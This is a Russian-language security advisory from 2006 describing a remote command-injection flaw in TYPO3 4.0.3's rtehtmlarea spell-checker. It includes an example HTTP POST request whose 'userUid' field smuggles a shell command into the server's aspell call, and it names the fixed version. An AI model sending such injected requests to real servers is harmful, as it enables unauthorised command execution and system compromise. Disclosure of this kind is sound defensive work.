Выполнение произвольных команд в TYPO3

Дата публикации:
26.12.2006
Дата изменения:
15.11.2008
Всего просмотров:
1988
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
TYPO3 4.x
Уязвимые версии:
TYPO3 4.0.3 и более ранние версии.
rtehtmlarea (расширение к TYPO3) 1.4.2 и более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать целевую систему.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "userUid" в сценарии sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell-check-logic.php перед использованием их в команде "aspell". Удаленный пользователь может выполнить произвольные команды на системе. Для успешной эксплуатации уязвимости опция "safe_mode" должна быть отключена в конфигурационном файла PHP. Пример:

--- post request ---

POST /typo3/sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell-

check-logic.php?id=1 HTTP/1.1

Host: www.typo3host.abc

User-Agent: none

Content-Type: application/x-www-form-urlencoded

Content-Length: 111

psell_mode=fast&to_p_dict=1&cmd=learn&userUid=test;+echo+'shell'+>+

/tmp/shell.txt+%23&enablePersonalDicts=true

--- /post request ---

URL производителя: typo3.org

Решение: Установите последнюю версию (4.0.4) с сайта производителя.

Ссылки: Remote Command Execution in TYPO3

или введите имя

CAPTCHA